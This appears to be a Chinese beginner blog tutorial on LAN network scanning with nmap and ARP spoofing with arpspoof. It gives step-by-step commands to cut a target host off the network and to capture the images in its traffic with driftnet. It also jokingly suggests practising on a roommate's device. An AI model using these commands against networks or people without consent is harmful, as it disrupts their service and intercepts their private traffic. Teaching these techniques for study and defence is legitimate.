• 【无线安全实践入门】网络扫描和ARP欺骗


    文中可能存在错误操作或错误理解,望大家不吝指正.
    同时也希望可以帮助到想要学习接触此方面、或兴趣使然的你,让你有个大概的印象.
    

    !阅前须知!
    本文是基于我几年前的一本笔记本,上面记录了我学习网络基础时的部分笔记.
    本文中的工具可能已经过时,或使用方法已经改变了,感兴趣可以深入查阅资料
    (但是我还是列出以前的使用方法供大家借鉴).

    ps.若对无线攻击手段WiFi破解感兴趣可以参考以下两篇文章
    【无线安全实践入门】基础攻击手段与常用工具简介
    【无线安全实践入门】破解WiFi密码的多个方法

    ps.本文环境在Kali下,学习最好具备一点linux基础知识.

    1.网络扫描和嗅探

    NMap(Network Mapper),一个很不错的网络扫描和嗅探工具包

    --NMap真的很常用,简直神器
    --列出几种简单的使用方法:
    
    --ping扫描,快速,不过回显的内容有限
    > nmap -sP (网关IP)/(子网掩码)
    
    --SYN/半开放扫描,加上-A回显详细信息
    > nmap -sS [-A] (网关IP)/(子网掩码)
    
    --单个扫描,显示详细内容
    > nmap -A (目标IP)
    
    --示例
    > nmap -sP 192.168.1.1/24
    

    2.ARP欺骗

    局域网中的ARP欺骗还是比较有意思的.像arpspoofEttercap等工具都很不错.
    arp欺骗之后其实可以很多动作的...
    这里就介绍老掉牙的arpspoof的断网攻击和图片捕获.

    ps.有条件的话,可以拿手机或者室友电脑练手(doge脸).

    --首先,在局域网环境中配合NMap工具使用,取得目标IP
    > nmap -sP (网关IP)/(子网掩码)
    

    2.1.断网攻击

    ps.修改ip_forward的值,是为了开启IP转发,其值为'0'时候则禁止转发,目标主机断网.

    --修改ip_forward(默认为'0')
    --可以提前cat查看一下,若是回显'0',则可以跳过本步
    > echo 0 > /proc/sys/net/ipv4/ip_forward 
    
    --开始arp欺骗
    > arpspoof -i (你的网卡名称) -t (目标IP) (网关IP)
    
    --使用目标主机上网测试,观察命令行回显.
    

    2.2.图片捕获

    --修改ip_forward(默认为'0')
    --可以提前cat查看一下,若是回显'1',则可以跳过本步
    > echo 1 > /proc/sys/net/ipv4/ip_forward 
    
    --开始arp欺骗(本机网卡名,可以用ifconfig来查看)
    > arpspoof -i (本机网卡名) -t (目标IP) (网关IP)
    
    --另外再开一终端,开始抓取图片
    > drifnet -i (本机网卡名)
    
    --使用目标主机上网看图片,观察弹出的窗口回显图片,观察命令行回显.
    

    常见的网络协议是网络安全中的基础,能让你能够更快吸收了解技术细节.




    加油,共勉

    作者 : 鹏鹏de博客

    如果需要转载本博客的文章,记得注明原文链接就可以了.

  • 相关阅读:
    synchronized关键字原理
    http几种请求格式总结
    logback配置
    docker部署nacos单机
    Diango migrate遇到问题
    pip安装ujson报错: error:Microsoft Visual C++ 14.0 is required
    vue watch监听新增属性
    git commit message规范与约束(全局安装)
    git commit message规范与约束(项目内安装)
    pip常用方法
  • 原文地址:https://www.cnblogs.com/PisecesPeng/p/11174561.html
Copyright © 2020-2023  润新知